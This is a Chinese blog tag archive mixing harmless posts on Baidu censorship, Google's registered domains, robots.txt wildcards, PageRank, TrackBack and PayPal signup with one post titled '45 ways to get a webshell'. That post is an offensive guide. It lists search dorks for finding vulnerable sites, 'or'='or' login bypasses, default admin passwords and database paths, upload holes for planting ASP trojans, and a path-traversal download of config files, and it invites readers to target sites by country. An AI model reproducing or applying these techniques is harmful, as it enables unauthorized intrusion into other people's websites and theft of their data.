Posts Tagged blog

百度没有鸡吧，中国没有言论自由

一 16

Posted by CrazyLemon in 疯狂的柠檬 | 1 Comment| 229 views

再提两个有趣的事

Google.cn搜“没有”这两个字，1月16号19点排第一位的网址：www.zuola.com/weblog/?p=453

标题为：真搞笑，百度没有鸡吧

可惜网站打不开的，查下了快照（有快照真好啊，ZF一定讨厌这东西）：

刚才看到allyesno的BLOG说到百度贴吧的十一生肖吧，他说有狗吧，有猪吧，没有鸡吧。我想应该是十二生肖才对啊，我也是属鸡的，我真的去百度找鸡吧，我怎么在百度贴吧里找不到”鸡吧”？我输入”鸡”，结果提示：

您所进入的贴吧不存在。

百度建议您：

看看输入的文字是否有误
输入其他关键词进入相关贴吧
百度真是BT啊，汉语本来就难学，用汉字表达太麻烦了，以后我们不用文字表达了，改学手语好了，并且，大家最好照领导的意思把中指切掉，这样有利于精神文明建设。

第二件，baidu.com搜”freedom of speech”这个词汇，结果如下：

freedom of speech
freedom of speech的中文翻译
以下结果来自互联网网络释义
1.言论自由(我国基本没有)
法律名词 – 英语沙龙 – 中国信合-农信…
freedom of speech言论自由(我国基本没有)

呵呵，不想说什么了，不然让盯上可不好

Tags: baidu, blog

copyright

一 9

Posted by CrazyLemon in 工作 | No Comments| 68 views

In China, copyright means copy is right.

转自念念的博客

Tags: blog, copy, get, tar

Google注册域名大全

十二 1

Posted by CrazyLemon in Google资讯 | No Comments| 58 views

日前，国外消息站点透露了Google所有注册的域名名单，这个名单记载了多达400多个域名网址。其中一些网址是我们正在使用的Google功能网站地址。

域名网址的大多数都涉及 Google 的主站名和已经发布的产品，例如：Google.com、 Google.net、 Google.org、Adwords.net等。

有一些网址似乎是防御钓鱼网站，防止对方欺骗用户重新导向，例如：Froogel.com。

有一些网址与色情有关，但会牵扯Google，败坏Google形象，例如：porngoogle.com、googleporn.com 、googlesex.com等。

还有一些，却可能与Google的未来发展有关，例如：gbrowser.com（浏览器）、googlewifi.com（WIFI，哈哈，前不久我们都听说了google这方面的信息）、gcalendar.com（日历）、gchat.com（难道除了Google Talk，他们还有别的聊天想法？）、googlebuy.com（在线购物）googlemusic.com（在线线音乐）。

有趣得是，Google 还拥有googlesucks.com 的网址。微软曾经被敌意用户注册过一个“windows-sucks” 的地址，看来Google也不想每天对着这么一个恶心自己的站点，让自己不高兴，不如自己买下来，好过被别人用来在自己头上拉屎。

这里还有一个纯数字的网址466453.com。400多域名中，Google单单挑选了这么一个数字域名，不知道是无聊还是别有企图？

反正，这告诉我们要有投资意识和风险意识

以下是 Google 注册域名的详细清单：

466453.com
Adsbygoogle.com
Adsense.net
Adwords.com
Adwords.net
Adwords.org
Adwordsexample.com
Adwordsgoogle.com
Adwords-select.com
Adwordselect.com
Adwordsselect.com
Adwordsselect.net
Adwordsselect.org
Akwan.com (still not registered as a Google domain)
Android.com (still not registered as a Google domain)
Answergoogle.com
Answer-google.com
Answersgoogle.com
Answers-google.com
AppliedSemantics.com
Appsem.com
Arabgoogle.com
Arabicgoogle.com
Askgoogle.com

Blogger.com
Blogspot.com

Catalogsgoogle.com
Chinagoogle.com
Cobrasearch.com

Deja.com
Deja.net
Dejadiscussion.com
Dejadiscussions.com
Deja-discussions.com
Dejanews.com
Dejanews.net
Dejanews.org
Dejastinks.com
Dejastinks.net
Dejasucks.net
Dejatracker.com
Deja-tracker.com
Dodgeball.com (still not registered as a Google domain)

Earthender.com
Earthender.net
Earthstream.com (still registered to Keyhole)
Earthviewer.com
Earthviewer.net
Earthviewer.org (still registered to Keyhole)
Elgoog.com
Elgoog.net
Elgoog.org

Firehunt.com (not registered to Google by using Google domain servers)
Foofle.com
Fourth-party.com
Fourthparty.net
Fourth-party.net
Fourthparty.org
Fourth-party.org
Froogel.com
Froogle.com
Froogol.com
Frooogle.com

Gbrowser.com
Gbrowser.net
Gbrowser.org
Gcalendar.com (currently registered to Data Docket*)
Gchat.biz
Gchat.us
Gdrive.com (currently registered to Data Docket*)

G00gle.com
Gewgle.Com
Gewgle.com
Gewgol.Com
Gewgol.com
Ggoogle.com
Ggoogle.com
Ggoogle.com
Ggoogle.com
Ggooglers.net
Ggooglers.org
Gigagoogle.com
Gigagoogle.net
Gigagoogle.org

Gmail.com
Gmmgjd.net
Gmmgjd.org
Gmmgjdwap.com
Gngjd.com
Gogle.com
Gogle.com
Gogole.com
Googel.com
Googel.com
Googil.comc
Google.biz
Google.com
Google.info
Google.info
Google.net
Google.org
Google.us
Google.ws
Google1.com
Google2.com
Google3.com
Google4mp3.com

Googleaccelerator.om
Google-access.com
Googleanswer.com
Google-answer.com
Googleanswers.com
Google-answers.com
Googlearabic.com
Googlebay.com
Googleblog.biz
Googleblog.info
Googleblog.com
Googleblog.net
Googleblog.org
Googleblows.com
Googleblows.net
Googleblows.org
Googlebot.com
Googlebox.biz (registered to Data Docket but using Google domain servers)
Googlebox.com (registered to Data Docket but using Google domain servers)
Googlebox.info (registered to Data Docket but using Google domain servers)
Googlebox.net (registered to Data Docket but using Google domain servers)
Googlebox.org (registered to Data Docket but using Google domain servers)

Googlebrowserbutton.com
Googlebrowserbuttons.com
Googlebucks.com
Googlebutton.com
Googlebutton.net
Googlebutton.org
Googlebuttons.com
Googlebuy.com
Googlebuy.info (currently registered to Data Docket*)
Googlebuy.net (currently registered to Data Docket*)
Googlebuy.org (currently registered to Data Docket*)
Googlecache.com
Googlecalendar.net (currently registered to Data Docket*)
Googlecatalog.com
Googlecatalogs.com
Googlecom.com
Googlecompute.com
Google-compute.com
Googlecompute.net
Googlecompute.org
Googlecomputers.com
Googlecomputing.com
Google-computing.com

Googledesktop.com
Google-desktop.com
Googledigital.info
Googledigital.net
Googledigital.org
Googledirectory.com
Googledirectory.net
Googledirectory.org
Googledoodle.com
Googledoodle.net
Googledoodle.org
Googleearth.info
Googleearth.com
Googleearth.net
Googleearth.org

Googlee.com
Googlefoundation.com
Googlefoundation.net
Googlefoundation.org (currently registered to Data Docket*)
Googlegear.com
Googlegear.net
Googlegear.org
Googlegoods.com
Googlegroups.com
Googleguy.com

Googleimages.com
Googleimageads.com
Google-inc.com
Googleit.com
Googleit.net
Googleit.org
Googlejobs.com
Googlejobs.net
Googlejournals.com
Googlelabs.net
Googlelabs.info
Googlelabs.net
Googlelabs.org
Googlelocal.net
Googlelocal.org

Googlemail.biz
Googlemail.com
Googlemail.info
Googlemail.org
Googlemail.us
Googlemaps.com
Googlemaps.org
Googlemovie.info
Googlemovie.net
Googlemovie.org
Googlemovies.info
Googlemovies.net
Googlemovies.org

Googlemusic.com
Googlenews.net
Googlenews.org
Googlenum.com

Googleoogle.com
Googleoogle.net
Googleoogle.org
Googlepage.org
Googleplex.com
Googleplex.org
Googleplus.com
Googleporn.com

Googleprint.biz
Googleprint.com
Googleprint.info
Googleprint.net
Googleprint.org
Googleprint.us
Googleproxy.com
Googlequiz.com
Googlequiz.net
Googlequiz.org
Googleregistrar.com

Googleearth.com
Googleearth.infi
Googleearth.net
Googleearth.org
Googlesatellite.com
Googlesatellite.info
Googlesatellite.net
Googlesatellite.org
Googlesearch.com
Googlesearch.net
Googleseek.com
Googlesex.com
Googlesex.info
Googleshopping.com
Googleshopping.net
Googleshopping.org (currently registered to Data Docket*)
Googlesidebar.com
Googlesidebar.net
Googlesidebar.org (currently registered to Data Docket*)

Googlesimplex.com
Googlesms.biz (currently registered to Data Docket*)
Googlesms.info (currently registered to Data Docket*)
Googlesms.org (currently registered to Data Docket*)
Googlesms.net (currently registered to Data Docket*)
Googlesms.us (currently registered to Data Docket*)
Googlesponsoredlinks.com
Googlestore.com
Googlestuff.com
Google-stuff.com
Googlesucks.com
Googlesucks.net
Googlesucks.org
Googlesyndication.com

Googletv.com (currently registered to Data Docket*)
Googletv.net
Googletv.org
Googletalk.info (currently registered to Data Docket*)
Googletalk.net
Googletalk.org (currently registered to Data Docket*)
Googletoolbar.com
Googlevideo.biz
Googlevillage.com
Googlewifi.info
Googlewifi.net
Googlewifi.org
Googlewireless.info
Googlewireless.net
Googlewireless.org
Googleworld.org

Googli.com
Googlie.com
Googlr.com
Goolge.com
Gooogle.com
Gotgoogle.com
Gppgle.com
Gppglr.com
Groupsgoogle.com
Guugle.com
Guugle.org
Igoogle.com
Igoogle.net
Igoogle.org

Kaltix.com
Kaltix.net
Kaltix.org
Keyhole.com
Keyholecorp.com
Keyholecorp.net
Keyholecorp.org (still registered to Keyhole)

Mobilegoogle.info
Mobilegoogle.net
Mobilegoogle.org
My-deja.com
Mydeja.net
My-deja.net
Mydejanews.com
My-dejanews.com
Mygoogle.com
My-google.com
Mygoogle.net
My-google.net
Mygoogle.org
My-google.org
Ngoogle.com
Numgoogle.com
Oingo.com
Orcit.com
Orcut.com
Orkat.com
Orkut.biz
Orkut.com
Orkut.org
Orkut.info

Porngoogle.com
Sergeybrin.com
Sergeybrin.net
Sergeybrin.org
Talageo.com
Toolbargoogle.com
Wapgmmgjd.com
Wapgoogle.com
Wapgoogle.com

Wappdapag.com
Wwapgmmgjd.com
Wwwadwordsselect.com
Wwwadwords-select.com
Wwwgoogle.com
Wwwgooglecom.com
Wwwgoogleoogle.com
Wwwgooglesyndication.com
Wwwwgoogle.com
Urchin.com (not registered to Google but using Google domain servers)
Urching.com
Urchinstats.com
Zipdash.com (acquired by Google but not registered to Google Inc. at the present time)

Tags: adsense, ask, blog, domain, ip, mail, ping, pr, proxy, rar, server, time, top, vi, Windows, word

雅虎和谷歌都宣布robots.txt文件支持通配符

十 28

Posted by CrazyLemon in SEO | No Comments| 139 views

以下是雅虎Search Blog发表的官方声明和robots.txt通配符解决方案：
Yahoo! Search Crawler (Yahoo! Slurp) – Supporting wildcards in robots.txt

I was going through my notes from Danny Sullivan’s Open Feedback sessions that occur during the ?Meet the Crawlers? panel at Search Engine Strategies. One of the items on my list was a request for enhanced syntax in robots.txt to make it easier for webmasters to manage how search crawlers, including Slurp, access your content.

For those who may not be as familiar with search index terminology, webmasters use the robots.txt file to direct robots that visit their site, including search engine crawlers, which files should be crawled and which shouldn’t be. You can read about our support for robots directives in the help for Yahoo! Slurp.

Well, we can scratch that one off the list, since we have just updated Yahoo! Slurp to recognize two additional symbols in the robots.txt directives ? ‘*’ and ‘$’. The semantics of these is what is as widely understood for robots.txt files.

‘*’ – matches a sequence of characters

You can now use ‘*’ in robots directives for Yahoo! Slurp to wildcard match a sequence of characters in your URL. You can use this symbol in any part of the URL string you provide in the robots directive. For example,

User-Agent: Yahoo! Slurp
Allow: /public*/ #允许所有以public开头的目录被索引
Disallow: /*_print*.html
Disallow: /*?sessionid #这句的意思是拒绝一切包含sessionid参数的页面被搜索引擎索引。

The robots directives above will:

allow all directories that begin with ‘public’, such as ‘/public_html/’ or ‘/public_graphs/’ to be crawled
disallow any files or directories which contain ‘_print’, such as ‘/card_print.html’ or ‘/store_print/product.html’ to be crawled
disallow any files with ‘?sessionid’ in their URL string, such as ‘/cart.php?sessionid=342bca31? to be crawled
Note that a trailing ‘*’ is redundant since that is existing matching behavior for Slurp. So, the following two directives are equivalent:

User-Agent: Yahoo! Slurp
Disallow: /private*
Disallow: /private

‘$’ ? anchors at the end of the URL string

You can now also use ‘$’ in robots directives for Slurp to anchor the match to the end of the URL string. Without this symbol, Yahoo! Slurp would match all URLs against the directives, treating the directives as a prefix. For example:

User-Agent: Yahoo! Slurp
Disallow: /*.gif$
Allow: /*?$

The robots directives above will

Disallow all files ending in ‘.gif’ in your entire site. Note that without the ‘$’, this would disallow all files containing ‘.gif’ in their file path
Allow all files ending in ‘?’ to be included. This would not automatically allow files that just contain ‘?’ somewhere in the URL string
As you can see, this symbol only makes sense at the end of the string. Hence, when we see it, we assume that your directive terminates there and any characters after that symbol are ignored.

Oh, by the way, if you thought we didn’t support the ‘Allow’ tag, as you can see from these examples, we do.

If you have any questions about the new syntax or any particular cases you are concerned about, please write in at the Site Explorer forums or read up our area.

Next time you see me at SES, you should ask me what else is on my list!

Priyank Garg
Product Manager, Yahoo! Search

可以用google管理员工具测试，一般第一次提交很快就会抓取robots.txt，然后更新就慢了点

Tags: ask, blog, file, Google资讯, Html, PHP, pr, rm, robot, style, time, update, user, vi, 搜索引擎

陈潇的剩余时间

十 18

Posted by CrazyLemon in 奇文趣事 | No Comments| 102 views

无意中看到今天百度更新的风云榜，上升最快第六位是“剩余时间”

原来还上了CCTV，所以火得很突然，最近CCTV终于做了点有趣的事了

搜了下，原来是淘宝上的，陈潇，应该是一个善良而且美丽的女孩子，我觉得

废话不多说，上链接

陈潇的剩余人生店

陈潇懒人的生灵

在猫扑上的贴子

以下是淘宝上的买家必读，挺有趣的，摘录下，做人，要有原则

陈潇的剩余人生店献给那些真正有时间需要的人

人的时间是可以买卖的
安排陈潇的生活是你们的权力，为你们服务是我的义务……

购买宝贝的形式是时间费用＋物品成本＋交通费用
购买的方式：
1、首先估算你的安排需要占用陈潇多少时间，包括车途等，有三个档位
举例：我要陈潇帮我写个大字报“xxxx”；我要发给短信给xxx；我要替我打个电话给xx——请购买陈潇的8分钟
我想要陈潇去看望我一个朋友；我想要陈潇去xx学校；去xx地方——请购买陈潇的1小时×数量（和路程远近有关）
我想要陈潇帮我找一个人；帮我选购一身服装——请购买陈潇的1天
2、然后估算一下你所需物品的成本价，拍一个你认为合适的价格
举例：我需要的商品大概价值290元，在找找你的价位里，请拍下价值10元的礼物×9件，价值100元的礼物×2件

3、你希望陈潇以什么方式去完成你的安排，选择你认为合理的交通工具的价格，在交通费用里购买，方式同第2条

购买流程：
1、你需要有淘宝帐号和网上银行，或者支付宝
2、拍下完成你安排的所有宝贝，在留言详情里写下详细的安排内容（时间、地点、联系人、事件），并用过网上银行或者支付宝完成付款
3、陈潇看到以后认为合理可以完成的会在12个小时内进行发货确认，复杂的安排会和你取得联系以后再进行发货确认，拍下宝贝24小时内不付款也没有任何说明的进行关闭交易处理。
4、按你的要求完成安排以后，你再确认收货
5、交易成功
6、双方好评

温馨提示：虽然你拍下了陈潇的时间，并付了款，但是由于排期问题，可能会错过一些安排。
如果陈潇没有按你的要求完成安排，请你申请退款，已付款项会全额退回。

郑重声明
1、特别澄清大家的误会，本店只是针对个人急需办理的事情收费。任何人提出的公益事件都不会收取费用。
2、陈潇的时间需要排期，请各位至少提前三天预约，以最终付款为准。
3、本店不售卖友情链接，拍下的朋友请自己申请退款。
4、陈潇不接受陪吃陪玩陪聊的安排，请勿反复询问。
5、服务的地区不限于北京市，但要视事情的轻重缓急。
6、本店的宝贝“陈潇的8分钟”已经全额捐献给慈善机构。
7、本店只提供合理合法的个人服务，商业洽谈另谈。

还有很多新的发现，这世界很有趣，有机会，我也拍下她八分钟

呵呵，看照片，挺漂亮的，亲切，可惜年纪比我大。。。

Tags: blog, get, Html, mop, tar, top, 生活, 礼物, 链接

google PR值1到10代表的意义（有点调侃）

十 9

Posted by CrazyLemon in SEO | No Comments| 79 views

PageRank 0～2
　　表示目前未有太多外部连结连到这个网站；但这不意味你的网站在Google那边排名就一定名落孙山。假如您讨论的主题够专，范围够狭窄，还是很有可能网友在Google上面搜寻时，您可以排名在很前面。

PageRank 3
一般经营两年以上的网站多能达到这个成绩；这是很不错的成绩，但是在热门搜寻领域里肯定还排不上边。

PageRank 4
　　能达到这个数字，已经证明链接到您的网站外部连结“质”、“量”俱佳。所谓量容易了解，而“质”则是指反向连结本身的PageRank也相当高。

PageRank 5
　　这表示有不少“具权威性”的重量级网站，连结到您的网站；通常Google内部会有一些他们特别重视的大站，如果你能取得这些网站的链接分数就会飙很快。大概此时您的网页内容在搜索引擎排行上就有蛮不错的表现。

PageRank 6
据说能突破5到6的网站非常少，从这里开始您的网站已经进入另外一个不同的境界。除了您的反向连结够多也够重量之外，事实上您自己的网站也堂堂是个“很有份量”的大站！

PageRank 7～10
　　从这里开始可以算是“神之领域”了。小弟看过数字上到这的网站，多半是纽约时报（New York Times）、Apple.com、Yahoo.com…这种“想当然尔”的大站。台湾的联合报、自由时报、中国时报三大报网站的PageRank也只有 6；显见要进入这个领域有多么不容易。个人Blog要达到这个分数，我猜应该是近乎不可能的任务。除非真把Blog当事业，整天冲刺打拼。

Tags: blog, Google资讯, pr, time, 搜索引擎, 链接

拿webshell的45种方法

九 29

Posted by CrazyLemon in 黑客技术 | No Comments| 204 views

1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
　　2.到Google ,site:cq.cn inurl:asp
　　3.利用挖掘鸡和一个ASP木马.
　　文件名是login.asp
　　路径组是/manage/
　　关键词是went.asp
　　用’or’='or’来登陆
　　4.关键字：Co Net MIB Ver 1.0网站后台管理系统
　　帐号密码为 ‘or’='or’
　　5.动感购物系统
　　inurl:help.asp登陆，如未注册成为会员!
　　upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞
　　6.默认数据库地址blogdata/acblog.asa
　　关键字：acblog
　　7.百度 /htdocs
　　注册里可以直接上传asa文件！
　　8./Database/#newasp.mdb
　　关键词：NewAsp SiteManageSystem Version
　　9.用挖掘机
　　关键字：Powered by WEBBOY
　　页面：/upfile.asp
　　10.baidu中搜索关键字Ver5.0 Build 0519
　　(存在上传漏洞)
　　11.Upfile_Article.asp bbs/upfile.asp
　　输入关键字：powered by mypower ，
　　12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
　　13.现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp
　　14.键字：首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛
　　挖掘鸡的关键字添 setup.asp
　　15.VBulletin论坛的数据库
　　默认数据库地址!
　　/includes/functions.php
　　工具:
　　1.网站猎手下载地址:百度 Google!
　　2.Google
　　关键字:
　　Powered by: vBulletin Version 3.0.1
　　Powered by: vBulletin Version 3.0.2
　　Powered by: vBulletin Version 3.0.3
　　其中一个就可以了
　　16.
　　1.打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cart
　　open source。这是一个商场系统。
　　2.网站的最底部分，有个 Comersus Open Technologies LC。打开看下~~comersus系统~
　　猜到,comersus.mdb. 是数据库名
　　数据库都是放在database/ 后的,
　　所以database/comersus.mdb
　　comersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。
　　那样把前一个store/除去，再加上database/comersus.mdb 试试
　　17.
　　无忧传奇官方站点程序。
　　1、后台管理地址：http://您的域名/msmiradmin/
　　2、默认后台管理帐号：msmir
　　3、默认后台管理密码：msmirmsmir
　　数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
　　数据库连接文件为 ***********/Conn.asp
　　18.
　　百度里输入/skins/default/
　　19.
　　利用挖掘机
　　关键机:power by Discuz
　　路径:/wish.php
　　配合:
　　Discuz!论坛 wish.php远程包含漏洞工具使用
　　20.
　　上传漏洞.
　　工具 : Domain3.5
　　网站猎手 1.5版
　　关键字powered by mypower
　　检测的页面或文件插入upfile_photo.asp
　　21.
　　新云漏洞
　　这个漏洞ACCESS和SQL版通吃。
　　Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
　　把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
　　以源码，软件等下载站居多。
　　大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
　　\database\%23newasp.mdb
　　如：#xzws.mdb 改成%23xzws.mdb
　　22.
　　通吃所有商城+动力上传系统
　　使用工具:挖掘鸡 v1.1 明小子
　　商城入侵:
　　关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
　　漏洞页面:upload.asp
　　upfile_flash.asp
　　动力入侵:
　　关键字:powered by mypower
　　漏洞页面:upfile_photo.asp
　　Upfile_Soft.asp
　　upfile_adpic.asp
　　upfile_softpic.asp
23.注射漏洞
　　百度搜

索:oioj’s blog
　　24
　　动易
　　列目录
　　admin_articlerecyclebin.asp
　　inurl:admin_articlerecyclebin.asp
　　25.
　　工具:网站猎手
　　关键词:inurl:Went.asp
　　后缀:manage/login.asp
　　口令:’or’='or’
　　26.
　　入侵魔兽私服
　　需要的工具：ASP木马一只。
　　Domain3.5明小子
　　关键字：All Right Reserved Design:游戏联盟
　　后台地址：admin/login.asp
　　数据库的地址：chngame/#chngame.mdb
　　27.
　　漏洞是利用管理员iis设置的失误
　　用baidu 关键字就是比较罕见的脚本名
　　动网: ReloadForumCache.asp
　　Leadbbs: makealltopanc.asp
　　BBSXP: admin_fso.asp
　　动易: admin_articlerecyclebin.asp
　　28.
　　国外站的爆库漏洞
　　关键字：sad Raven’s Guestbook
　　密码地址:/passwd.dat
　　后台地址:/admin.php
　　29.
　　Discuz 4.1.0跨站漏洞
　　利用工具:1,WAP浏览器
　　2,WAP编码转换器
　　关键字:”intext:Discuz! 4.1.0″
　　30.
　　关键字：尚奈克斯
　　后台路径/system/manage.asp
　　直接传ASP木马
　　31.
　　工具
　　1:网站猎手
　　2:大马一个
　　关键字:切勿关闭Cookies功能，否则您将不能登录
　　插入diy.asp
　　32.
　　关键字:Team5 Studio All rights reserved
　　默认数据库:data/team.mdb
　　33.
　　工具: 挖掘机辅臣数据库读取器
　　关键字: 企业简介产品展示产品列表
　　后缀添加: /database/myszw.mdb
　　后台地址: admin/Login.asp
　　34.
　　关键子 XXX inurl:Nclass.asp
　　在”系统设置”里写个木马。
　　会被保存到在 config.asp内。
　　35.
　　不进后台照样拿动网WEBSHELL
　　data.asp?action=BackupData 动网数据库备份默认路径
　　36.
　　工具:网站猎手 WebShell
　　关键字:inurl:Went.asp
　　后缀:manage/login.asp
　　弱口令:’or’='or’
　　37.
　　关键字:Powered by:QCDN_NEWS
　　随便扫遍文章加一个’ ,来试探注入点
　　后台地址:admin_index.asp
　　38.
　　入侵雷池新闻发布系统
　　关键字:leichinews
　　去掉leichinews后面的.
　　打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
　　再上传马…..
　　进访问uppic anran.asp 登陆马.
　　39.
　　关键字:Power System Of Article Management Ver 3.0 Build 20030628
　　默认数据库:database\yiuwekdsodksldfslwifds.mdb
　　后台地址:自己扫描!
　　40.
　　一、通过GOOGLE搜索找大量注入点
　　关键字：asp?id=1 gov.jp/ asp?id=
　　页数：100
　　语言：想入侵哪个国家就填什么语言吧
　　41.
　　关键字：Powered by:94KKBBS 2005
　　利用密码找回功能找回admin
　　提问:ddddd 回答:ddddd
　　42.
　　关键字:inurl:Went.asp
　　后台为manage/login.asp
　　后台密码: ‘or’=’ 或者 ‘or=or’ 登录　进入
　　默认数据库地址:Database/DataShop.mdb
　　43.
　　关键字:****** inurl:readnews.asp
　　把最后一个/改成%5c ,直接暴库,看密码,进后台
　　随便添加个新闻在标题输入我们的一句话木马
　　44.
　　工具:一句话木马
　　BBsXp 5.0 sp1 管理员猜解器
　　关键词:powered by bbsxp5.00
　　进后台,备份一句话马!
　　45.
　　关键字：程序核心：BJXSHOP网上开店专家
　　后台:/admin

Tags: backup, baidu, blog, discuz, domain, file, FTP SERVER, Google资讯, iis, photo, PHP, ping, rar, rm, shell, system, top

什么是TrackBack?

九 16

Posted by CrazyLemon in WordPress | No Comments| 65 views

TrackBack是一种网络日志应用工具，它可以让网志作者知道有那些人看到自己的文章后撰写了与之有关的短文。在Movable Type和WordPress软件中，包含有该功能。这种功能通过在网志之间互相「ping」的机制，实现了网站之间的互相通告；因此，它也可以提供提醒功能。
　　*TrackBack功能一般出现在一个网志文章的下方，同时会显示对方网志的摘要信息、URL和网志标题。
　　*TrackBack规范由Six Apart在2000年制订，并在Movable Type2.2中予以实现。
　　trackback (引用通告)
　　trackback是现在WEB2.0的产物,BLOG成为WEB2.0的关键包括TRACKBACK的功能,原理如下:
　　在自己的空间(不管你在哪里建立了自己的BLOG或SPACE),你都必不可少的发表一些评论,以前的做法就是在文章下面跟帖评论,很可能要不定时回去看看自己的评论别人是如何看待的,TRACKBACK就是为了解决这个问题而生的.
　　你在BLOG发表一篇评论的时候,在尾部的引用栏输入对方文章的引用(TRACKBACK)地址,那么你发表完文章后,对方的BLOG就会自动在你所评论的文章的尾部添加了你的引用信息,所显示的信息因程序而不同,基本的要素包括了你评论的标题和你的评论的链接,其他人可以很清楚地看到你的引用,并很方便地点击就可以来看你的文章.
　　Blog跟BBS有点重要的不同，Blog是一种个人创作，用Blog来发表自己的东西，保存自己的东西，即使是对他人Blog文章的评论也要在自己的Blog中永久保留下来。通过Trackbak，我就可以在自己的Blog中发表文章，同时把自己这篇文章的URL地址Ping到鱼头的那篇文章上去。这样，所有阅读鱼头文章的人也能通过Trackback顺藤摸瓜地来我的Blog看我的文章。
　　所以，当我们的Blog有了Trackback Ping功能，那么谁都可以通过Trackback Ping来发表意见和评论了。这样，多家Blog网站就通过相关话题而联接起来。各种评论在Internet上相互连接而织成一张大网。因此，可以说， Trackback创造出了Blog与BBS、Diary完全不同的文化，Blog的世界通过Trackback而变成真正的无限互连。
　　作为Blogger，让我们习惯于这样讨论问题和做评论吧：把内容写在自己的Blog里面，Trackback Ping到别人的Blog。这个概念是论坛模式里从来没有的，称为Remote Commenting。
　　早期版本的Trackback规范中，Ping是GET方式的HTTP请求，现在不再支持GET方式，只能用POST方式。
　　参数包括：
　　title – 文章的标题
　　excerpt – 文章的摘要。在Movable Type系统中，如果摘录信息超过255个字符将会被截断为252个字符，并在后面增加…三个字符
　　url – 文章的永久连接。象其它永久连接一样，这个连接应可能准确地在页面中定位文章的入口，因有疑问时这个链接会用到
　　blog_name – 发表文章的blog的名称
　　在上述的参数中只有url是必须的。如果title没有提供，url的值将被用作标题。
　　当我的Blog发出这个Trackback Ping后，将接收一个简单的XML格式应答，如果Ping成功，那么应答的格式如下：
　　<?xml version=”1.0″ encoding=”iso-8859-1″?>
　　<response>
　　<error>0</error>
　　</response>
　　而失败应答的格式为：
　　<?xml version=”1.0″ encoding=”iso-8859-1″?>
　　<response>
　　<error>1</error>
　　<message>The error message</message>
　　</response>

Tags: blog, error, get, iso, ping, pr, space, word, WordPress, 链接

什么是PAYPAL？如何申请PAYPAL？

八 12

Posted by CrazyLemon in 百科 | No Comments| 154 views

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://phoenixlyf.blogbus.com/logs/444828.html

一、什么是PAYPAL？如何申请PAYPAL？
Paypal是现在网络上流行的免费信用卡，现在对包括中国在内的近40个国家开放，Paypal支付将成为以后网上收钱的一个主要方式。但要注意的是：你要完全激活你的帐号，必须要有一张Master卡或Visa卡，否则现在只能申请一个帐号，以后有卡后才能激活。

进入PAYPAL的申请页面（按—-注册）按要求依次填入
First Name 　 Last Name 　名　姓　
Street Address 　市内地址，　上栏写不下写这里　
City 　 State / Province / Region* 　城市　省　
Postal Code* 　 Country 　邮政编码　国籍　
Country of which you are a citizen 　　　国籍　　　
Home Telephone (country code first) 家庭电话，中国为86开头
Work Telephone* (country code first) 　工作电话，同上　
Email Address (this will be your login name) 电子邮箱
Confirm Email Address 　确认电子邮箱　
Your password must be at least 8 characters and is case sensitive. 　
Create password 　 Confirm Password 　密码（8位以上）　确认密码　
Select Security Question 1 　 Answer 1 　找回密码问题1 　答案1 　
Select Security Question 2 　 Answer 2 　找回密码问题2 　答案2 　
If you forget your password, we will ask you for the answers to your security questions. 　
　
As a security measure, please enter the characters you see in the boxon the left into the box on the right. (The characters are not case sensitive.) Help?
　这里会显示几个随机字母,填写左边显示的字母
　
　 Would you like this to be a Premier Account? Yes No 是否成为高级会员，建议选no
Get all of our premium features for a low fee of just 1.9% + 30￠ (blended rate) on incoming payments.
　
　 Click here to indicate that you have read and agree to the　terms of use.Please note that in order to send, receive, or withdraw money with PayPal, you will need to register and confirm a credit or debit card.
打勾表示同意规则
发送后下一页会要求输入Master卡或Visa卡的资料，如果你没有，可以打住不再继续。过一会儿您的邮箱会收到确认信，要将提供其中链接打开，再输入密码即可确认成功。
等您申请好卡后可登录进账号，进入左下角Add credit card填写信息即可激活账号即可！
二、申请办理Master卡或Visa卡的方法
*以工商银行的牡丹国际借记卡为例
去工商行申请国际借记卡（记得要带上身份证）。银行要求你填写一张申请表，你可以申请有效期1－5年可以，你填写之后要你交手续费和年费，手续费20元，年费50元/年，如：你申请2年有效期，你就要交120给银行了。约过一个月左右（视你所在地方，如北京的朋友就不用等这么久了），银行通知你去拿卡，并要求你存入500美元，这500美元在存入一个星期后才会记录在你的卡上。（但是有些朋友办完卡后却不需要存入这么多钱，看来还是各地的规定不太一样啊）。
*关于牡丹卡的一些问题
为什么牡丹卡卡面上带有“Master Card”或“VISA”标志：中国工商银行于1990年2月加入了万事达卡国际组织，成为其主会员银行。“MasterCard”即为该组织的标志。1990年6月，中国工商银行以首席会员的名义加入了威士国际组织，“VISA” 即为该组织的标志。根据国际信用卡组织的规定，每个会员银行发行的信用卡卡面上必须带有该组织的标志，因此，牡丹卡卡面上带有“Master Card”或“VISA”标志。
消费：牡丹国际卡在国内可在贴有牡丹卡的特约商户使用，在国外可在贴有VISA或MasterCard标志(配图)的商户使用。
　
存现：牡丹国际卡可办理人民币和外币存款业务。持卡人凭牡丹国际卡可在本、异地的发卡机构或储蓄所存款，牡丹国际卡无异地存款手续费。　　
　
取现：凭牡丹国际卡在工商银行的储蓄所提取现金，取现时必须出示身份证件，取现手续费由发卡机构直接从持卡人帐户扣收。商务卡不得在境内支取现金。持卡人在国外，可在贴有VISA或MasterCard标志(配图)的自动取款机上支取当地货币。取现手续费按取现金额1%收取，最低收3元或3美元。　　
　　
